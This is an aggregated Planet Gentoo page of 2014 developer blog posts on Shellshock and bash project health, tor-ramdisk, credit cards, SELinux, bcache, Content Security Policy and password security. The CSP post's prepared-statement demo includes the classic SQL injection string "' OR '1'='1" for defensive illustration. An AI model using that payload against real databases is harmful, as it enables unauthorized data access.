Gentoo is currently stagnating, and that's hard to deny. I've stopped being active since I finally accepted stable employment – I'm almost thirty, it was time to stop playing around, I needed to make a living, even if I don't really make a life – and QA has obviously taken a step back (I still have a non-working dev-python/imaging on my laptop). So trying to push for getting rid of bash in Gentoo altogether is not a good deal. On the other hand, even though it's going to be probably too late to be relevant, I'll push for having a Summer of Code next year to convert eselect to Python or something along those lines.

Myself, I decided that the current bashisms in the init scripts I rely upon on my servers are simple enough that dash will work, so I pushed that through puppet to all my servers. It should be enough, for the moment. I expect more scrutiny to be spent on dash, zsh, ksh and the other shells in the next few months as people migrate around, or decide that a 25-year-old bug is enough to think twice about all of them, so I'll keep my options open.

This is actually why I like software biodiversity: it gives you alternatives to fall back on when one component fails, and that is what worries me the most about systemd right now. I also hope that showing how bad bash has been all this time with its closed development will make it possible to have a better syntax-compatible shell with a proper parser, even better with a properly librarised implementation. But that's probably hoping too much.

September 27, 2014
Anthony Basile a.k.a. blueness (homepage, bugs)
Tor-ramdisk 20140925 released (September 27, 2014, 16:35 UTC)

I’ve been blogging about my non-Gentoo work using my drupal site at  but since I may be losing that server sometime in the future, I’m going to start duplicating those posts here.  This work should be of interest to readers of Planet Gentoo because it draws a lot from Gentoo, but it doesn’t exactly fall under the category of a “Gentoo Project.”

Anyhow, today I’m releasing tor-ramdisk 20140925.  As you may recall from a previous post, tor-ramdisk is a uClibc-based micro Linux distribution I maintain whose only purpose is to host a Tor server in an environment that maximizes security and privacy.  Security is enhanced using Gentoo’s hardened toolchain and kernel, while privacy is enhanced by forcing logging to be off at all levels.  Also, tor-ramdisk runs in RAM, so no information survives a reboot, except for the configuration file and the private RSA key, which may be exported/imported by FTP or SCP.

A few days ago, the Tor team released an update with one major bug fix, according to their ChangeLog. Clients were apparently sending the wrong address for their chosen rendezvous points for hidden services, which sounds like it shouldn’t work, but it did because they also sent the identity digest. This fix should improve browsing of hidden services. The other minor changes involved updating geoip information and the address of a v3 directory authority, gabelmoo.

I took this opportunity to also update busybox to version 1.22.1, openssl to 1.0.1i, and the kernel to 3.16.3 + Gentoo’s hardened-patches-3.16.3-1.extras. Both the x86 and x86_64 images were tested using node “simba” and showed no issues.

You can get tor-ramdisk from the following URLs (at least for now!)




September 26, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

Living on Credit Cards
Photo credit: Images_of_Money

Almost exactly 18 months after moving to Ireland, I'm finally about to receive my first Irish credit card. This took longer than I expected, but at least it should cover a few of my needs, although it's not exactly my perfect plan either. But I guess it's better to start from the top.

First of all, I already have credit cards, Italian ones which, as I wrote before, are not chip'n'pin. That causes a major headache in countries such as Ireland (but the UK too), where cards without chip'n'pin are not really well supported or understood. This means they are not viable, even though I have been using them for years and have enough credit history with them that they have a higher limit than the norm, which is especially handy when dealing with things like expensive hotels when I'm on vacation.

But the question becomes: why do I need a credit card? The answer lies in the mess that is the Irish banking system: since there is no "good" bank over here, I've been using the same bank I signed up with when I arrived, AIB. Unfortunately their default account, which is advertised as "free", is only really free if your bank account never goes below €2.5k for the whole quarter. This is not the "usual" style I've seen from American banks, where they expect your average not to go below a certain amount — it does not matter if one day you have no money and the next you have €10k: if for one day in the quarter you dip below the threshold, you have to pay for the account, and dearly. At that point every single operation becomes a €.20 charge. Including PayPal's debit/credit verification, AdSense EFT account verification, Amazon KDP monthly credits. And including every single use of your debit card — for a while, NFC payments were excluded, so I tried to use them more, but very few merchants allowed that, and the €15 limit on their use made it quite impractical to pay for most things. In the past year and a half, I paid an average of €50/quarter for a so-called free account.

Operations on most credit cards are, on the other hand, free; there are sometimes charges for "overseas usage" (foreign transactions), and you are charged interest if you don't pay the full amount of the debt at the end of the month, but you don't pay a fixed charge per operation. What you do pay here in Ireland is stamp duty, which is €30/year — a whole lot more than Italy, where it was €1.81 until they dropped it altogether. So my requirement for a credit card is essentially to hide as much of these costs as possible. Which means that just getting a standard AIB card is not going to be very useful: yes, I would be saving money after the first 150 operations, but I would save even more by keeping those €2.5k in the bank.

My planned end games were two: a Tesco credit card and an American Express Platinum, for very different reasons. I was finally able to get the former, but the latter is definitely out of my reach, as I'll explain later.

The Tesco credit card is a very simple option: you get 0.5% "pointback", as you get 1 Clubcard point for every €2 spent. Since each point gives you a €.01 discount at the end of the quarter, it's almost a cashback, as long as you buy your groceries from Tesco (which I do, because it's handy to have the delivery rather than having to go out for it, especially for things that are frozen or that weigh a bit). Given that it starts with (I'm told) a puny limit of €750, maxing it out every month is enough to earn back the stamp duty through the cashback alone, and it becomes even easier by using it for all the small operations such as dinner, Tesco orders, online charges, the mobile phone, …
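A quick back-of-the-envelope check, assuming the €750 limit really is maxed out every single month:

```shell
# 1 Clubcard point per €2 spent, each point worth €0.01 → 0.5% back.
yearly=$((750 * 12))        # €9000 through the card per year
cashback=$((yearly / 200))  # 0.5% of that, in whole euro
echo "about €${cashback} back vs €30 stamp duty"
```

So even at the entry-level limit the cashback comfortably covers the €30/year stamp duty, with a little left over.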

Getting the Tesco credit card has not been straightforward either. I tried applying a few months after arriving in Ireland, and I was rejected, as I did not have any credit history at all. I tried again earlier this year, adding a raise at work, and the results have been positive. Unfortunately that's only step one: the following steps require you to provide them with three pieces of documentation: something that ensures you're in control of the bank account, a proof of address, and a proof of identity.

The first is kinda obvious: a recent enough bank statement is good, and so is the second — a phone or utility bill. The problem starts when you notice that they ask for an original and not a copy "from the Internet". This does not work easily given that I explicitly made sure all my services are paperless, so neither the bank nor the phone company sends me paper any more — the bank was the hardest to convince: for over a year they kept sending me a paper letter for every single wire I received, with the exception of my pay; that included money coming from colleagues when I acted as a payment hub, PayPal transfers for verification purposes, and Amazon KDP revenue, one per country! Luckily, they accepted a colour-printed copy of both.

Getting a proper ID certified was, though, much more complex. The only document I could use was my passport, as I don't have a driving license or any other Irish ID. I made a proper copy of it, in color, and brought it to my doctor for certification, he stamped and dated and declared, but it was not okay. I brought it to An Post – the Irish postal service – and told them that Tesco wanted a specific declaration on it, and to see the letter they sent me; they refused and just stamped it. I then went to the Garda – the Irish police – and I repeated Tesco's request; not only they refused to comply, but they told me that they are not allowed to do what Tesco was asking me to make them do, and instead they authenticated a declaration of mine that the passport copy was original and made by me.

What worked, at the end, was to go to a bank branch – didn't have to be the branch I'm enrolled with – and have them stamp the passport for me. Tesco didn't care it was a different branch and they didn't know me, it was still my bank and they accepted it. Of course since it took a few months for me to go through all these tries, by the time they accepted my passport, I needed to send them another proof of address, but that was easy. After that I finally got the full contract to sign and I'm now only awaiting the actual plastic card.

But as I said my aim was also for an American Express Platinum card. This is a more interesting case study: the card is far from free, as it starts with a yearly fee of €550, which is what makes it a bit of a status symbol. On the other hand, it comes with two features: their rewards program, and the perks of Platinum. The perks are not all useful to me, having Hertz Gold is not useful if you don't drive, and I already have comprehensive travel insurance. I also have (almost) platinum status with IHG so I don't need a card to get the usual free upgrades if available. The good part about them, though, is that you can bless a second Platinum card that gets the same advantages, to "friends or family" — in my case, the target would have been my brother in law, as he and my sister love to travel and do rent cars.

It also gives you the option of sending four more cards to friends and family, and in particular I wanted to have one sent to my mother, so that she can have a way to pay for things and debit them to me, so I can help her out. Of course, as I said, it has a cost, and a hefty one. On the other hand, it allows one more trick: you can pay for the membership fee through the same rewards program they sign you up for. I don't remember how much you have to spend in a year to cover it, but I'm sure I could have managed to get most of the fee waived.

Unfortunately what happens is that American Express requires, in Ireland, a "bank guarantee" — which according to colleagues means your bank should be taking on the onus of paying for the first €15k debt I would incur and wouldn't be able to repay. Something like this is not going to fly in Ireland, not only because of the problem with loans after the crisis but also because none of the banks will give you that guarantee today. Essentially American Express is making it impossible for any Irish resident to get a card from them, and this, again according to colleagues, extends to cardholders in other countries moving into Ireland.

The end result is that I'm now stuck with having only one (Visa) credit card in Ireland, which has a feeble, laughable rewards program, but at least I have it, and it should be able to repay itself. I'm out to find a MasterCard I can use to hedge my bets on card acceptance – it turns out that Visa is not well received in the Netherlands and in Germany – and that can repay its own stamp duty.

Tech media has been in a frenzy this year, trying to hype everything out there as the end of the Internet of Things or the nail in the coffin of open source. A bunch of opinion pieces I found also tried to imply that open source software is to blame, forgetting that the only reason the security issues found were considered so nasty is that we know the software is widely used.

First there was Heartbleed, with its discoverers deciding to spend time setting up a cool name, logo and website for it, rather than ensuring it would be patched before it became widely known. Months later, LastPass still tells me that some of the websites I have passwords on have not changed their certificates. This at least spawned some interest around OpenSSL, including the OpenBSD fork, which I'm still not sure is going to stick around or not.

Just a few weeks ago a dump of passwords caused a major stir as some online news sources kept insisting that Google had been hacked. Similarly, people have been insisting for the longest time that it was only Apple's fault that the photos of a bunch of celebrities were stolen and published on a bunch of sites — and will probably never be expunged from the Internet's collective conscience.

And then there is the whole hysteria about Shellshock, which I already dug into. What I promised in that post was a look at the problem from the angle of project health.

With the term project health I'm referring to a whole set of issues around an open source software project. It's something that becomes second nature for a distribution packager/developer, but is not obvious to many, especially because it is not easy to quantify. It's not a function of the number of commits or committers, the number of mailing lists or the traffic in them. It's an aura.

That OpenSSL's project health was terrible was no mystery to anybody. The code base in particular was terribly complicated and catered to corner cases that stopped being relevant years ago, and the LibreSSL developers have found plenty of reasons to be worried. But the fact that the codebase was in such a state, and that the developers didn't care to follow what the distributors do, or review patches properly, was not a surprise. You just need to be reminded of the Debian SSL debacle, which dates back to 2008.

In the case of bash, the situation is a bit more complex. The shell is a base component of all GNU systems, and is the FSF's choice of UNIX shell. The fact that the man page clearly states It's too big and too slow. should tip people off, but it doesn't. And it's not just a matter of extending the POSIX shell syntax with enough sugar that people take it for a programming language and start using it as one, though that's also a big part of what caused this particular issue.

The health of bash was not considered good by anybody involved with it on a distribution level. It certainly was not considered good by me, as I moved to zsh years and years ago, and I have been working for over five years on getting rid of bashisms in scripts. Indeed, I have been pushing, with Roy and others, for the init scripts in Gentoo to be made completely POSIX shell compatible so that they can run with dash or with busybox — even before I was paid to do so for one of the devices I worked on.

Nowadays, the point is probably moot for many people. I think this is the most obvious positive PR for systemd I can think of: no thinking of shells any more, for the most part. Of course it's not strictly true, but it does solve most of the problems with bashisms in init scripts. And it should solve the problem of using bash as a programming language, except it doesn't always, but that's a topic for a different post.

But why were distributors, and Gentoo devs, so wary about bash, way before this happened? The answer is complicated. While bash is a GNU project and the GNU project is the poster child for Free Software, its management has always been sketchy. There is a single developer – The Maintainer, as the GNU website calls him, Chet Ramey – and the sole point of contact for him is the mailing lists. The code is released in dumps: a release tarball on the minor version, then every time a new micro version is to be released, a new patch is posted and distributed. If you're a Gentoo user, you can notice this when emerging bash: you'll see all the patches being applied one on top of the other.

There is no public SCM — yes, there is a Git "repository", but it's essentially just an import of a given release tarball, with each released patch applied on top of it as a commit. Since these patches each represent a whole point release, and may be fixing different bugs, related or not, it's definitely not as useful as having a repository where the intent of each change shows clearly, so that you can figure out what is being done. Reviewing a proper commit-per-change repository is orders of magnitude easier than reviewing a diff between code dumps.

This is not completely unknown in the GNU sphere: glibc has had a terrible track record as well, and only recently, thanks to lots of combined efforts, is sanity being restored. This also includes fixing a bunch of security vulnerabilities found or driven into the ground by my friend Tavis.

But this behaviour is essentially why people like me and other distribution developers have been unhappy with bash for years and years: not the particular vulnerability, but the health of the project itself. I have been using zsh for years, even though until now I had not installed it on all my servers (it's done now), and I have been pushing for a while for /bin/sh in Gentoo to be provided by dash. Debian has already done it, and as a result the vulnerability is much less scary for them.

So yeah, I don't think it's happenstance that these issues are being found in projects that are not healthy. And it's not because they are open source, but rather because they are "open source" in a way that does not help. Yes, bash is open source, but it's not developed in the open like many other projects; it's developed behind closed doors, with one single leader.

So remember this: be open in your open source project, it makes for better health. And try to get more people than just yourself involved, and review publicly the patches that you're sent!

September 24, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)

Almost an entire year ago (just a few days apart) I announced my first published book, called SELinux System Administration. The book covers SELinux administration commands and focuses on Linux administrators who need to interact with SELinux-enabled systems.

An important part of SELinux was only covered very briefly in the book: policy development. So in the spring of this year, Packt approached me and asked if I was interested in authoring a second book for them, called SELinux Cookbook. This book focuses on policy development and tuning of SELinux to fit the needs of the administrator or engineer, and as such is a logical follow-up to the previous book. Of course, given my affinity with the wonderful Gentoo Linux distribution, it is mentioned in the book (and is even the reference platform), even though the book itself is checked against Red Hat Enterprise Linux and Fedora as well, ensuring that every recipe in the book works on all distributions. Luckily (or perhaps not surprisingly) the approach is quite distribution-agnostic.

Today, I got word that the SELinux Cookbook is now officially published. The book uses a recipe-based approach to SELinux development and tuning, so it is quickly hands-on. It gives my view on SELinux policy development while keeping the methods and processes aligned with the upstream policy development project (the reference policy).

It’s been a pleasure (but also somewhat of a pain, as this is done in free time, which is scarce already) to author the book. Unlike the first book, where I struggled a bit to keep the page count to the requested amount, this book was not limited. Also, I think the various stages of the book's development contributed well to the final result (something I overlooked a bit the first time, so this time I re-re-reviewed changes over and over again: after the first editorial reviews, then after the content reviews, then after the language reviews, then after the code reviews).

You’ll see me blog a bit more about the book later (as the marketing phase is now starting), but for me this is a major milestone which allowed me to write down more of my SELinux knowledge and experience. I hope it is as good a read for you as I intended it to be.

September 21, 2014
Luca Barbato a.k.a. lu_zero (homepage, bugs)
Outreach Program for Women (September 21, 2014, 13:49 UTC)

Libav participated in the summer edition of the OPW. We had three interns: Alexandra, Katerina and Nidhi.


The three interns had different starting skills, so the projects picked differed in breadth and scope.

Small tasks

Everybody has to start from a simple task, and they did as well. Polishing crufty code is one of the best ways to start learning how it works. In Libav's case we have plenty of spots that require extra care, and hidden bugs usually get uncovered that way.

Not so small tasks

Katerina decided to do something radical from the start: she tried to use coccinelle to fix a whole class of issues in one fell swoop. I’m still reviewing the patch and splitting it into smaller chunks to single out false positives. The patch itself shone a spotlight on some of the most horrible code still lingering around; hopefully we’ll get to fix those parts soon =)

Demuxer rewrite

Alexandra and Katerina showed interest in specific targeted tasks; they honed their skills by reimplementing the ASF and RealMedia demuxers respectively. They even participated in the first Libav Summer Sprint in Torino and worked together with their mentor in person.

They had to dig through the specifications and figure out why some sample files behave in unexpected ways.

They are almost there and hopefully our next release will see brand new demuxers!

Jack of all trades

Libav has plenty of crufty code that requires some love: plenty of overly long files, lots of small quirks that should be ironed out. Libav (as any other big project) needs some refactoring here and there.

Nidhi’s task was mainly focused on fixing some of those and helping others do the same by testing patches. She had to juggle many different tasks and learn about many different parts of the codebase and the toolset we use.

It might not sound as extreme as replacing ancient code with something completely new (and making it work at least as well as the former), but both kinds of task are fundamental to keeping the project healthy!

In closing

All the projects have been a success and we are looking forward to seeing further contributions from our new members!

Sebastian Pipping a.k.a. sping (homepage, bugs)
Designer wanted: Western pieces for Chinese chess (September 21, 2014, 12:36 UTC)


Chinese chess is a lot easier to get into for non-Chinese people if, for the first few games, a horse looks like a Western knight rather than 馬/傌. Publicly available piece set graphics all seem to have one or more of the following shortcomings:

  • Raster rather than vector images
  • Unclear or troublesome licensing
  • Poor aesthetics ([1], [2], [3], [4], [5], [6])
  • Lack of elephant, cannon/catapult, advisor pieces


Simplified, what I am looking for is a clean, Western-style set of the seven Xiangqi pieces.

The resulting graphics will be published with CC0 Public Domain Dedication licensing for use to everyone. Particular use cases are use with xiangqi-setup, XBoard/WinBoard and Wikipedia.

In more detail

  • Seven pieces per party: Chariot/rook, horse, elephant, advisor, king, cannon/catapult, pawn
  • Use black “ink” only: Black pieces should be all black with parts cut out, “white”/“red” pieces should be black outlines with the body cut out (example here)
  • No two pieces should be hard to distinguish, in particular not:
    • Pawns, advisors and king
    • Elephants and horses
    • Cannons and chariots
  • Advisors should not look similar to queens in western chess
  • Flat 2D is fine. If some pieces imitate 3D, all of them should (so no flat and pseudo 3D in the same set)
  • Needs to work at small sizes. So either two sets for small and regular display or one set that works at any size.
  • Pieces should not have a circle for a background (unlike this)
  • Not too arty, not too fancy, specific rather than abstract. Clean and simple but appealing, please.
  • Chinese culture elements welcome, if you know how to use them well.

Are you interested in working on this project? Please get in touch!

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
bcache (September 21, 2014, 11:59 UTC)

My "sacrificial box", a machine reserved for any experimentation that can break stuff, has had annoyingly slow IO for a while now. I've had 3 old SATA harddisks (250GB) in a RAID5 (because I don't trust them to survive), and recently I got a cheap 64GB SSD that initially became the new rootfs.

The performance difference between the SATA disks and the SSD is quite amazing, and the difference to a proper SSD is amazing again. Just for fun: the 3-disk RAID5 writes random data at about 1.5MB/s, the crap SSD manages ~60MB/s, and a proper SSD (e.g. Intel) easily hits over 200MB/s. So while this is not great hardware it's excellent for demonstrating performance hacks.

Recent-ish kernels finally have bcache included, so I decided to see if I can make use of it. Since creating new bcache devices is destructive, I copied all data away, reformatted the relevant partitions and then set up bcache. So the SSD is now 20GB rootfs, 40GB cache. The RAID5 stays as it is, but gets reformatted with bcache.
In code:

wipefs -a /dev/md0 # remove old headers to unconfuse bcache (without -a, wipefs only lists signatures)
make-bcache -C /dev/sda2 -B /dev/md0 --writeback --cache_replacement_policy=lru
mkfs.xfs /dev/bcache0 # no longer using md0 directly!
Now performance is still quite meh, what's the problem? Oh ... we need to attach the SSD cache device to the backing device!
ls /sys/fs/bcache/
45088921-4709-4d30-a54d-d5a963edf018  register  register_quiet
That's the UUID we need, so:
echo 45088921-4709-4d30-a54d-d5a963edf018 > /sys/block/bcache0/bcache/attach
and dmesg says:
[  549.076506] bcache: bch_cached_dev_attach() Caching md0 as bcache0 on set 45088921-4709-4d30-a54d-d5a963edf018

So what about performance? Well ... without any proper benchmarks, just copying the data back I see very different behaviour. iotop shows writes happening at ~40MB/s, but as the network isn't that fast (100Mbit switch) it's only writing every ~5sec for a second.
Unpacking chromium is now CPU-limited and doesn't cause a minute-long IO storm. Responsiveness while copying data is quite excellent.

The write speed for random IO is a lot higher, reaching maybe 2/3rds of the SSD natively, but I have 1TB storage with that speed now - for a $25 update that's quite amazing.

Another interesting thing is that bcache is chunking up IO, so the harddisks are no longer making an angry purring noise with random IO, instead it's a strange chirping as they only write a few larger chunks every second. It even reduces the noise level?! Neato.

First impression: This is definitely worth setting up for new machines that require good IO performance, the only downside for me is that you need more hardware and thus a slightly bigger budget. But the speedup is "very large" even with a cheap-crap SSD that doesn't even go that fast ...

Edit: ioping, for comparison:
native sata disks:
32 requests completed in 32.8 s, 34 iops, 136.5 KiB/s
min/avg/max/mdev = 194 us / 29.3 ms / 225.6 ms / 46.4 ms

bcache-enhanced, while writing quite a bit of data:
36 requests completed in 35.9 s, 488 iops, 1.9 MiB/s
min/avg/max/mdev = 193 us / 2.0 ms / 4.4 ms / 1.2 ms

Definitely awesome!

September 19, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)
Some experience with Content Security Policy (September 19, 2014, 08:17 UTC)

I recently started playing around with Content Security Policy (CSP). CSP is a very neat feature and a good example of how to get IT security right.

The main reason CSP exists is cross site scripting vulnerabilities (XSS). Every time a malicious attacker is somehow able to inject JavaScript or other executable code into your webpage, this is called an XSS. XSS vulnerabilities are amongst the most common vulnerabilities in web applications.

CSP fixes XSS for good

The approach to fix XSS in the past was to educate web developers that they need to filter or properly escape their input. The problem with this approach is that it doesn't work. Even large websites like Amazon or Ebay don't get this right. The problem, simply stated, is that there are just too many places in a complex web application to create XSS vulnerabilities. Fixing them one at a time doesn't scale.

CSP tries to fix this in a much more generic way: How can we prevent XSS from happening at all? The way to do this is to have the web server send a header which defines where JavaScript and other content (images, objects etc.) is allowed to come from. If used correctly, CSP can prevent XSS completely. The problem with CSP is that it's hard to add to an already existing project, because if you want CSP to be really secure you have to forbid inline JavaScript. That often requires large-scale re-engineering of existing code. Preferably, CSP should be part of the development process right from the beginning. If you start a web project, keep that in mind and educate your developers to use restrictive CSP before they write any code. Starting a new web page without CSP these days is irresponsible.

To play around with it I added a CSP header to my personal webpage. This was a simple target, because it's a very simple webpage. I'm essentially sure that my webpage is XSS-free because it doesn't use any untrusted input; I mainly wanted an easy target to do some testing. I also tried to add CSP to this blog, but that turned out to be much more complicated.

For my personal webpage this is what I did (PHP code):
header("Content-Security-Policy:default-src 'none';img-src 'self';style-src 'self';report-uri /c/");

The default policy is to accept nothing. The only things I use on my webpage are images and stylesheets and they all are located on the same webspace as the webpage itself, so I allow these two things.

This is an extremely simple CSP policy. To give you an idea of what a more realistic policy looks like, this is the one from GitHub:
Content-Security-Policy: default-src *; script-src; object-src; style-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data: * * *; media-src 'none'; frame-src 'self'; font-src; connect-src 'self'

Reporting feature

You may have noticed in my CSP header line that there's a "report-uri" command at the end. The idea is that whenever a browser blocks something via CSP, it is able to report this to the webpage owner. Why should we do this? Because we still want to fix XSS issues (there are browsers with little or no CSP support; I'm looking at you, Internet Explorer), and we want to know if our policy breaks anything that is supposed to work. The way this works is that a JSON file with details is sent via a POST request to the URL given.

While this sounds really neat in theory, in practice I found it to be quite disappointing. As I said above, I'm almost certain my webpage has no XSS issues, so I shouldn't get any reports at all. However, I get lots of them and they are all false positives. The problem is browser extensions that execute things inside a webpage's context. Sometimes you can spot them (when source-file starts with "chrome-extension" or "safari-extension"), sometimes you can't (source-file will only say "data"). Sometimes this is triggered not by single extensions but by combinations of different ones (I found out that the combination of HTTPS Everywhere and Adblock for Chrome triggered a CSP warning). I'm not sure how to handle this, or whether it is something that should be reported as a bug to either the browser vendors or the extension developers.
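To make this concrete, here is a sketch of what such a report body looks like and how a collector endpoint might filter out the extension noise described above. The field names follow the CSP reporting format; all values are invented for illustration:

```python
import json

# Example report body, as a browser would POST it to the report-uri
# endpoint (values are invented for illustration).
raw = '''{"csp-report": {
    "document-uri": "https://example.com/",
    "violated-directive": "default-src 'none'",
    "blocked-uri": "data",
    "source-file": "chrome-extension://abcdef"
}}'''

def is_extension_noise(report):
    """Heuristic from above: reports whose source-file points into a
    browser extension are false positives, not real XSS."""
    src = report.get("source-file", "")
    return src.startswith(("chrome-extension", "safari-extension"))

report = json.loads(raw)["csp-report"]
print(is_extension_noise(report))  # prints: True
```

As the post notes, this heuristic only catches the spottable cases; reports where source-file merely says "data" cannot be distinguished this way.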


If you start a web project, use CSP. If you have a web page that needs extra security, use CSP (my bank doesn't; does yours?). CSP reporting is neat, but its usefulness is limited due to too many false positives.

Then there's the bigger picture of IT security in general. Fixing single security bugs doesn't work. Why? XSS is as old as JavaScript (1995) and it's still a huge problem. An example of a similar technology is prepared statements for SQL. If you use them you won't have SQL injections. SQL injections are the second most prevalent web security problem after XSS. By using CSP and prepared statements you eliminate the two biggest issues in web security. Sounds like a good idea to me.
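For illustration, a minimal sketch of the prepared-statement idea, using Python's built-in sqlite3 module (the table and the attack string are invented):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, pw TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'secret')")

# Attacker-controlled input that would break naive string interpolation
name = "' OR '1'='1"

# Parameter binding: the input is passed as data, never parsed as SQL,
# so the injection attempt simply matches no rows.
rows = conn.execute("SELECT pw FROM users WHERE name = ?", (name,)).fetchall()
print(rows)  # prints: []
```

The same class of bug that keeps recurring with string-built queries simply cannot occur here, which is exactly the "fix the whole class, not single bugs" point.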

Buffer overflows were first documented in 1972 and they are still the source of many security issues. Fixing them for good is trickier, but it is also possible.

September 18, 2014
Michał Górny a.k.a. mgorny (homepage, bugs)
Password security in network applications (September 18, 2014, 21:16 UTC)

While we have many interesting modern authentication methods, password authentication is still the most popular choice for network applications. It’s simple, it doesn’t require any special hardware, it doesn’t discriminate anyone in particular. It just works™.

The key requirement for maintaining the security of a secret-based authentication mechanism is the secrecy of the secret (password). Therefore, it is very important for the designer of network applications to regard the safety of the password as essential and do their best to protect it.

In particular, the developer can affect the security of the password in three ways:

  1. through the security of server-side key storage,
  2. through the security of the secret transmission,
  3. through encouraging user to follow the best practices.

I will expand on each of them in order.

Security of server-side key storage

For secret-based authentication to work, the server needs to store some kind of secret-related information. Commonly, it stores the complete user password in a database. Since this can be valuable information, it should be especially well protected so that even in case of unauthorized access to the system the attacker cannot obtain it easily.

This could be achieved through the use of key derivation functions, for example. In this case, a derived key is computed from the user-provided password and used in the system. With a good design, the password could actually never leave the client’s computer: it can be converted straight to the derived key there, and the derived key may be used from that point forward. Therefore, the best that an attacker could get is the derived key, with no trivial way of obtaining the original secret.
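A sketch of such key derivation with a standard KDF (PBKDF2 from Python's hashlib); the password, salt and iteration count here are arbitrary example values, not a recommendation:

```python
import hashlib

password = b"correct horse battery staple"  # example secret
salt = b"user@example.com"                  # example: per-user, non-secret salt
iterations = 200_000                        # example work factor

# The derived key is what gets stored (or, in the client-side design
# described above, transmitted); the cleartext password stays local.
derived = hashlib.pbkdf2_hmac("sha256", password, salt, iterations)
print(derived.hex())
```

The derivation is deterministic for a given password, salt and iteration count, but reversing it requires a brute-force search, which the iteration count deliberately makes expensive.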

Another interesting possibility is restricting access to the password store. In this case, the user account used to run the application does not have read or write access to the secret database. Instead, a proxy service is used that provides necessary primitives such as:

  • authenticating the user,
  • changing user’s password,
  • and allowing user’s password reset.

It is crucial that none of those primitives can be used without proving the necessary user authorization. The service must provide no means to obtain the current password, or to set a new password, without proving user authorization. For example, a password reset would have to be confirmed using an authentication token that is sent to the user’s e-mail address (note that the e-mail address must be securely stored too) directly by the password service — that is, bypassing the potentially compromised application.

Examples of such services are PAM and LDAP. In both cases, only the appropriately privileged system or network administrator has access to the password store, while every user can access the common authentication and password setting functions. In case a bug in the application serves as a backdoor to the system, the attacker does not have sufficient privileges to read the passwords.

Security of secret transmission

The authentication process and other functions involving transmitting secrets over network are the most security-concerning processes in the password’s lifetime.

I think this topic has been satisfactorily described multiple times, so I will just summarize the key points shortly:

  1. Always use secured (TLS) connection both for authentication and post-authentication operations. This has multiple advantages, including protection against eavesdropping, message tampering, replay and man-in-the-middle attacks.
  2. Use sessions to avoid having to re-authenticate on every request. However, re-authentication may be desired when accessing data crucial to security — changing e-mail address, for example.
  3. Protect the secrets as early as possible. For example, if derived key is used for authentication, prefer deriving it client-side before the request is sent. In case of webapps, this could be done using ECMAScript, for example.
  4. Use secure authentication methods if possible. For example, you can use challenge-response authentication to avoid transmitting the secret at all.
  5. Provide alternate authentication methods to reduce the use of the secret. Asymmetric key methods (such as client certificates or SSH pre-authentication) are both convenient and secure. Alternative one-time passwords can benefit the use of application on public terminals that can’t be trusted being secure from keylogging.
  6. Support two-factor authentication if possible. For example, you can supplement password authentication with TOTP. Preferably, you may use the same TOTP parameters as Google Authenticator uses, effectively enabling your users to use multiple applications designed to serve that purpose.
  7. And most importantly, never ever send user’s password back to him or show it to him. For preventing mistakes, ask user to type the password twice. For providing password recovery, generate and send pseudorandom authorization token, and ask the user to set a new password after using it.
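As an illustration of point 6, here is a sketch of TOTP with the parameters Google Authenticator uses (HMAC-SHA1, 30-second time step, 6 digits), built on RFC 4226 HOTP; the shared secret below is the RFC test key, used only as an example:

```python
import hashlib
import hmac
import struct
import time

def hotp(secret, counter, digits=6):
    """RFC 4226: HMAC-SHA1 over the 8-byte counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret, now=None, step=30):
    """RFC 6238: HOTP keyed on the current 30-second time window."""
    t = int((time.time() if now is None else now) // step)
    return hotp(secret, t)

secret = b"12345678901234567890"  # example secret (the RFC 4226 test key)
print(hotp(secret, 0))  # prints: 755224 (the first RFC 4226 test vector)
```

Server and client each compute the same 6-digit code independently, so the password itself is never the only factor in play.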

Best practices for user management of passwords

With server-side key storage and authentication secured, the only potential weakness left is the user’s system. While the application administrator can’t (and often shouldn’t) control it, he should encourage the user to follow best practices for password security.

Those practices include:

  1. Using a secure, hard-to-guess password. Including a properly working password strength meter and a few tips is a good way of encouraging this. However, as explained below, a weak password should merely trigger a warning rather than a fatal error.
  2. Using different passwords for separate applications to reduce the damage resulting from an attack resulting in obtaining the secret.
  3. If the user can’t memorize the password, using a dedicated, encrypted key store or a secure password derivation method. Examples of the former include built-in browser and system-wide password stores, and also dedicated applications such as KeePass. Example of the latter is Entropass that uses a user-provided master password and salt constructed from the site’s domain.
  4. Using the password only in response to properly authenticated requests. In particular, the application should have a clear policy when the password can be requested and how the authenticity of the application can be verified.

A key point is that all the good practices should be encouraged, and the developer should never attempt to force them. If there should be any limitations on allowed passwords, they should be rather technical and rather flexible.

If there is a minimum length for a password, it should only aim at withstanding the first round of a brute-force attack. Technically speaking, any limitation actually reduces entropy, since the attacker can safely omit short passwords. However, with the number of possibilities growing exponentially with length, this hardly matters.

Similarly, requiring the password to contain characters from a specific set is a bad idea. While it may sound good at first, it is yet another way of reducing entropy and making the passwords more predictable. Think of the sites that require the password to contain at least one digit. How many users have passwords ending with the digit one (1), or maybe their birth year?
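A back-of-the-envelope illustration of that entropy argument (assuming uniformly chosen characters, which real users don't quite achieve; the lengths and charsets are example values):

```python
from math import log2

# Naive entropy of an 8-character password drawn uniformly from
# lowercase letters plus digits (36 symbols):
free_choice = 8 * log2(36)            # about 41.4 bits

# What a "must contain a digit" rule often produces in practice:
# a 7-letter lowercase word with a single digit appended.
word_plus_digit = log2(26 ** 7 * 10)  # about 36.2 bits

print(round(free_choice, 1), round(word_plus_digit, 1))  # prints: 41.4 36.2
```

Five bits may not sound like much, but it is a factor of roughly 30 fewer candidates for an attacker who guesses the predictable pattern first.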

The worst case is sites that do not support setting your own password, and instead force you to use a password generated by some kind of pseudo-random algorithm. Simply put, this is an open invitation to write the password down. And once written down in cleartext, the password is no longer a secret.

Setting low upper limits on passwords is not a good idea either. It is reasonable to set some technical limitations, say, 255 bytes of ASCII printable characters. However, setting the limit much lower may actually reduce the strength of some of user passwords and collide with some of the derived keys.

